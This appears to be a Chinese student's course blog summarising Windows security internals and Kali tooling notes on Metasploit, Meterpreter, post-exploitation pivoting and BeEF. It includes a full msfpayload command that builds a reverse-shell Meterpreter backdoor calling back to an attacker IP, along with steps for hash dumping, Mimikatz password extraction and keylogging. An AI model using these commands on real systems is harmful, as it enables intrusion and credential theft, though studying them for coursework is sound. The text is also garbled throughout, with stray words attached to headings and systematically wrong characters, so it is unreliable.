攻防第七週做業

教材學習內容總結

1、Windows操做系統框架

一、Windows操做系統的發展與現狀php

Windows在桌面操做系統中佔有很是高的市場份額,Windows XP系統在國內仍有大量的用戶html

二、Windows操做系統基本結構web

(1)Windows操做系統內核基本模塊sql

  • Windows執行體:Windows內核核心文件ntoskrnl.exe的上層接口shell

  • Windows內核體:Windows內核核心文件ntoskrnl.exe中函數實現與硬件體系結構支持代碼,實現底層的操做系統功能數據庫

  • 設備驅動程序:包括將用戶I/O操做映射爲特定硬件設備I/O請求的硬件設備驅動程序程序,以及文件系統與網絡設備驅動程序。windows

  • 硬件抽象層:hal.dll文件,用於屏蔽Windows內核與平臺硬件差別性的底層代碼.api

  • Windows窗口與圖形界面接口內核實現代碼:win.32k.sys文件瀏覽器

(2)Windows操做系統在用戶態的代碼模塊安全

  • 系統支持進程:Windows開機自動啓動的系統內建服務進程

  • 環境子系統服務進程:爲操做系統運行環境提供支持的服務進程

  • 服務進程:經過windows的服務管理機制所啓動的一系列系統及網絡服務

  • 用戶應用軟件:在用戶態執行的各種用戶應用軟件

  • 核心子系統DLL:即kernel32.dll/user32.dll/gdi32.dll/avapi32.dll等動態鏈接庫文件,做爲用戶態服務進程與應用軟件和操做系統內核的交互接口,將用戶態程序調用的系統API函數映射到相應的一個或多個Windows內部的系統服務調用。

(3)核心機制

  • Windows進程和線程管理機制

  • Windows內存管理機制
  • Windows文件管理機制
  • Windows註冊表管理機制
  • Windows的網絡機制、

    ①網卡硬件設備驅動程序,位於OSI物理層
    ②NDIS庫及miniport驅動程序,位於OSI鏈路層
    ③TDI傳輸層,網絡協議驅動,位於OSI網絡層與傳輸層
    ④網絡API DLL 及TDI客戶端,對應OSI會話層與表示層
    ⑥網絡應用程序與服務進程,對應OSI應用層

    2、Windows操做系統的安全體系結構與機制

    一、Windows安全體系結構

Windows操做系統基於引用監控器模型來實現基本的對象安全模型。系統中全部主體對客體的訪問都經過引用監控器做爲中介,由引用監控器根據安全訪問控制策略來進行受權訪問,全部訪問記錄也都由引用監控器生成審計日誌。

Windows操做系統實現基礎的安全機制,其中最核心的是位於內核的SRM安全引用監控器,以及位於用戶態的LSASS安全服務,它們與Winlogon/Netlogon及Eventlog等服務一塊兒,實現了對主體用戶的身份認證機制,對全部資源對象的訪問控制機制,以及對訪問的安全審計機制。

2.Windows身份認證機制

Windows操做系統中以安全主體概念來包含全部進行系統資源訪問請求的實體對象,有用戶、用戶組和計算機三大類,對於每一個安全主體,以時間和空間上都全局惟一的SID安全標識符來進行標識。帳戶權限的根本做用就是限制這些帳戶內運行程序對系統資源對象的訪問。

Windows系統中擁有一些內建帳戶,如擁有最高權限的本地Administrator帳戶,做爲自動運行系統進程環境的SYSTEM/LocalSystem帳戶,具備相對極少權限的Guest匿名訪問用戶,以及IUSR_Machinename IIS服務的匿名網絡訪問帳戶等。而這些帳戶在黑客眼中,本地Administrator和SYSTEM帳戶擁有最高的權限,是他們攻擊的終極目標。

Windows系統的內建用戶組包括:本地最高權限用戶組Administrators、具備單一方面系統權限的Account/Backup/Server/Print Operators等操做組、用於容納服務帳戶的Network Service與Local Service用戶組,以及全部用戶帳戶所在的Users組等。 Windows用戶帳戶的口令字通過加密處理以後被保存於SAM或者活動目錄AD中,其中本地用戶帳戶口令信息通過不可逆的128位隨機密鑰Hash加密後存儲在SAM文件中,SAM存儲於%systemroot%\system32\config\sam文件系統路徑位置,並在註冊表的HKEY_LOCAL MACHINE\SAM存有副本。

Windows域帳戶口令信息則保存在域控制器的活動目錄AD中,加密方式與單機平臺一致,存儲文件系統位置是域控制器的%systemroot%\ntds\ntds.dit路徑。

Windows支持本地身份認證和網絡身份認證兩種方式,分別對在本地系統登陸和遠程網絡訪問的主主體進行合法性驗證。網絡身份認證過程由LSASS服務的Netlogon模塊主導完成。

Windows進程、GINA圖形化登陸窗口,與LSASS服務經過協做來完成本地身份認證過程。

三、Windows受權與訪問控制機制

Windows受權與訪問控制機制是基於引用監控器模型,由內核中的SRM模塊與用戶態的LSASS服務共同來實施。在Windows服務器操做系統中,用戶能夠執行內建的whoami命令來查看當前用戶的訪問令牌信息。Windows對於系統中全部需保護的資源都抽象成對象,具體類型包括文件、目錄、註冊表鍵值、內核對象、同步對象、私有對象、管道、內存、通訊接口等,而對每一個對象會關聯一個SD安全描述符,有如下屬性組成:

  • Owner SID
  • Group SID
  • DACL 自主訪問控制列表
  • SACL 系統審計訪問控制列表

圖片897

四、Windows安全審計機制

系統審計策略在本地安全策略中由系統管理員定義,來肯定系統對哪些事件進行記錄。

五、Windows的其餘安全機制

身份認證、受權與訪問控制以及安全審計是三個基本安全功能。保護Windows系統安全穩定運行最爲關鍵的三項安全措施——防火牆、補丁自動更新以及病毒防禦。除安全中心以外,Windows的安全特性還包括IPSec加密與驗證機制、EFS加密文件系統、Windows文件保護機制、捆綁的IE瀏覽器所提供的隱私保護與瀏覽安全保護機制等

3、Windows遠程安全攻防技術

  • 遠程口令猜想與破解攻擊
  • 攻擊Windows網絡服務
  • 攻擊Windows客戶端及用戶

一、Windows系統的安全漏洞生命週期

系統安全的本質核心在於安全漏洞、滲透攻擊及安全檢測防護機制之間的攻防博弈與競賽。
  • Windows安全漏洞發現、利用與修補過程
  • 安全漏洞公開披露信息庫
  • 針對特定目標的滲透測試攻擊過程

①漏洞掃描測試
②查找針對發現漏洞的滲透代碼
③實施滲透測試

使用Metasploit軟件實施滲透測試:Metasploit軟件採用開發框架和模塊組建的可擴展模型,以Ruby語言編寫的Metasploit Framework(MSF)庫做爲整個軟件的基礎核心,爲滲透測試組建的開發與測試提供平臺;模塊組建是真正實施滲透攻擊的代碼,包括利用安全漏洞的Exploits模塊,進行掃描、查點等其餘輔助任務的Auxiliary模塊,在目標系統上植入和運行的Shellcode攻擊負載Payloads模塊,對攻擊負載進行編碼以躲避檢測的Encoders模塊,以及對攻擊負載進行填充的Nops模塊;Metasploit提供多種用戶接口,包括Console交互終端、命令行程序運行、Web交互界面以及GUI圖形化界面;Metasploit還提供了API接口及插件支持,來支持第三方在MSF基礎上開發擴展模塊,好比自動化的滲透測試例程等等。

二、Windows遠程口令猜想與破解攻擊

  • 遠程口令字猜想
  • 遠程口令字交換通訊竊聽與破解
  • 遠程口令猜想與破解防範措施

三、Windows網絡服務遠程滲透攻擊

Windows操做系統默認開放135(TCP),137(UDP),139(TCP)與445(TCP)端口,對應的網絡服務爲MSRPC與過程調用服務,NetBIOS網絡基本輸入輸出系統服務和SMB文件與打印機共享服務。

  • 針對NetBIOS網絡服務的著名漏洞及攻擊
  • 針對SMB網絡服務的著名漏洞及攻擊
  • 針對MSRPC網絡服務的著名漏洞及攻擊
  • 針對Windows系統上微軟網絡服務的遠程滲透攻擊
  • 針對Windows系統上第三方網絡服務的遠程滲透攻擊
  • 網絡服務遠程滲透攻擊防範措施

4、Windows本地安全攻防技術

一、Windows本地特權提高

終極特權:Administrator或者Local System帳戶。從受限用戶權限嘗試得到特權帳戶的攻擊技術也被稱爲特權提高。

二、Windows敏感信息竊取

  • Windows系統口令字密文提取技術
  • Windows系統口令字破解技術
  • 用戶敏感數據竊取
  • 本地敏感信息竊取防範措施

三、Windows消蹤滅跡

  • 關閉審計功能
  • 清理事件日誌
  • 針對消蹤滅跡的防範措施

四、Windows遠程控制與後門程序

  • 命令行遠程控制工具
  • 圖形化遠程控制工具
  • 針對後門程序防範措施

參考資料
http://blog.sina.com.cn/s/blog_acdeaa0901017irl.html

視頻內容學習

26.KaliSecurity - 漏洞利用之檢索與利用

漏洞檢測和利用工具

1.searchsploitl漏洞檢索工具,這個項目是由Offensive Security發起的、基於exploit database官方漏洞數據庫源的漏洞搜索工具,能夠直接在終端搜索漏洞相關信息,如漏洞簡介和漏洞驗證/利用腳本。列出全部文件

列出了全部漏洞和對應的文件地址

從目錄中進入漏洞對應的相對地址

用到指令 : cat php/webapps/6.php

搜索windows上iis服務的遠程漏洞:root@localhost:~# searchsploit windows iis remote

2.pattern creat

在緩衝區溢出時可使用這個命令,例pattern create 1000 a就是能夠輸出1000個a

3.ikat

網絡漏洞掃描工具,能夠開一個端口和IP地址,一旦有漏洞的主機經過這個端口掃描它,就會中招,並植入一個shellcode。等待目標訪問中招

4.Termineter 旨在評估智能電錶的安全性,Python Smart Meter Testing Framework。

## 27. 漏洞利用之Metasploit基礎總結 ##

Metasploit在滲透測試中常常能夠用到,包含了不少工具,這些工具造成一個完整的攻擊框架。

在Kali中使用metaaploie,須要先開啓PostgreSQL數據庫服務和metasploit服務,而後就能夠完整的利用msf數據查詢exploit和記錄。

service postgresql start
service metasploit start

若是不想每次開機都手工啓動服務,能夠配置隨系統啓動。

update-rc.d postgresql enable
update-rc.d metasploit enable

2、路徑介紹

Kali中msf的路徑爲/usr/share/metasploit-framework

  • Auxiliary:輔助模塊,
  • encoders:供msfencode編碼工具使用,具體可使用

    msfencode –l

  • exploits:攻擊模塊 每一個介紹msf的文章都會提到那個ms08_067_netapi,它就在這個目錄下。
  • payloads:其中列出的是攻擊載荷,也就是攻擊成功後執行的代碼。好比咱們常設置的windows/meterpreter/reverse_tcp就在這個文件夾下。
  • post:後滲透階段塊,在得到meterpreter的shell以後可使用攻擊代碼。好比經常使用的hashdump、arp_scanner就在這裏。

三、基本命令

msfpayload:用來生成payload或者shellcode

搜索的時候能夠用msfpayload -l |grep "windows"這樣的命令查詢。-o 選項能夠列出payload所需的參數

msfencode:msf中的編碼器,早期爲了編碼繞過AV,如今經常使用msfpayload與他編碼避免exploit的壞字符串。

msfconsole:開啓metasploit的concle最經常使用的命令。

四、測試示例:發現漏洞,搜索exploit

前期經過掃描的值目標21端口vsftp服務版本爲2.3.4,使用msfconsole打開msf的命令行版本,經過search語句搜索是否有漏洞。

這個版本沒有發現漏洞。

2八、KaliSecurity - 漏洞利用之Meterpreter介紹

meterpreter 是metasploit框架中的一個擴展模塊,做爲溢出成功之後的攻擊載荷使用,攻擊載荷在溢出成功後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個meterpretershell.

meterpreter做爲後滲透模塊有多中類型,而且命令由核心命令和擴展庫命令組成,極大地豐富了攻擊方式,其有不少有用的功能,如,添加一個用戶,隱藏一些東西,打開shell,獲得用戶密碼,上傳下載遠程主機的文件,運行cmd.exe,捕獲屏幕,獲得遠程控制權,捕獲按鍵信息,清除應用程序,顯示遠程主機的系統信息,顯示遠程及其的網絡接口和IP地址等信息。

常見的命令:

background:將當前會話放置後臺

load/use:加載模塊

interact:切換進一個信道

migrate:遷移進程

run:執行一個已有的模塊,這裏要說的是輸入run後按兩下tab,會列出全部的已有的腳本。

resource:執行一個已有的rc腳本經常使用的meterpreter類型爲:payload/windows/meterpreter/reverse_tcp

攻擊步驟:

一、生成Meterpreter後門 :命令:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.129.200 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe

當前kali的IP地址爲:192.168.129.200

二、打開MSF,開啓監聽,選擇exploit/multi/handler

確保打開

三、在目標機器上執行door.exe
四、經過help命令查看可執行的命令
五、常見命令使用,包括系統信息,抓取屏幕截圖與抓取HASH等。
六、目錄瀏覽
七、鍵盤監聽
八、擴展工具,load/use以後再輸入help,就能夠了看到有關這個模塊的命令的說明了
九、擴展工具之Minikatz,抓取本地密碼明文

2九、KaliSecurity - 漏洞利用之Metasploit後滲透測試

在跳板獲取必定權限後須要積極地向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,藉助msf已經獲得的Meterpreter後門,可使系列的操做更容易。

一、查看當前網卡、網段信息。ifconfig

二、添加路由表

run autoroute -s 10.0.0.1

可使用msf中的模塊跨網段攻擊或掃描。可經過腳本autoroute快速添加。

三、開socket代理,經過使用auxiliary/server/socks4a模塊,建立一個socks代理,能夠爲瀏覽器,sqlmap,nmap使用。經過代理便可訪問內網計算機。

四、經過background和session -i能夠自由切換進入session。

五、輸入run能夠看到在meterpreter上能夠作的不少命令。

六、經過run post/能夠看到後滲透測試模塊

七、獲取內網信息 run arp_acanner -h

八、也能夠上傳文件,作端口轉發後進行後續測試。

30.漏洞利用之BeeF總結

對XSS漏洞須要強大框架的支持,如網上的XSS平臺。在Kali下,BeeF是一個不遜色於XSS平臺的工具。Beef是瀏覽器攻擊框架的簡稱,是一款專一於瀏覽器端的滲透測試工具。官網 http://beefproject.com/

一、命令行下啓動 beef beef-xss 此時瀏覽器自動訪問此頁面:http://127.0.0.1:3000/ui/authentication 使用默認用戶名beef與默認密碼beef登陸:

左側爲目標的瀏覽器

二、假設被測試主機因爲XSS漏洞請求到 http://192.168.129.200:3000/demos/basic.html

出現拒絕訪問的狀況,以後就沒有成功。。也是很無奈。

左側online browsers出現新的選項,其Current Browser中包括瀏覽器名稱、版本、操做系統版本等。

三、HOOK持續的時間爲關閉測試頁面爲止,在此期間,至關於被控制了,能夠發送攻擊命令,在Commands模塊,咱們能夠完成不少任務:

其中,四種顏色分別表示:

  • 該攻擊模塊可用,但隱蔽性強
  • 該攻擊模塊可用,但隱蔽性差
  • 該用戶模塊是否可用還有待驗證
  • 該攻擊模塊不可用

選取MISC下Raw JavaScript模塊做爲測試用例

執行,查看返回結果,成功則顯示

四、代理Proxy功能

選中目標主機,點右鍵,在菜單中選中Use as Proxy;而後在Rider選項卡中的Forge Request編輯併發送想要發送的內容。

學習進度條

博客量(新增/累計) 學習時間(新增/累計) 本週學習收穫
目標 20 200小時 完成每週做業
第1~5周 6/6 65h/65h kali的使用及攻防一些基本知識
第6周 1/7 16h/81h 對傳輸層的安全結構有了深入的瞭解,學習使用kali一些工具
第7周 1/8 14h/95h 瞭解Windows操做系統攻防,學習使用metaspoitable
相關文章
相關標籤/搜索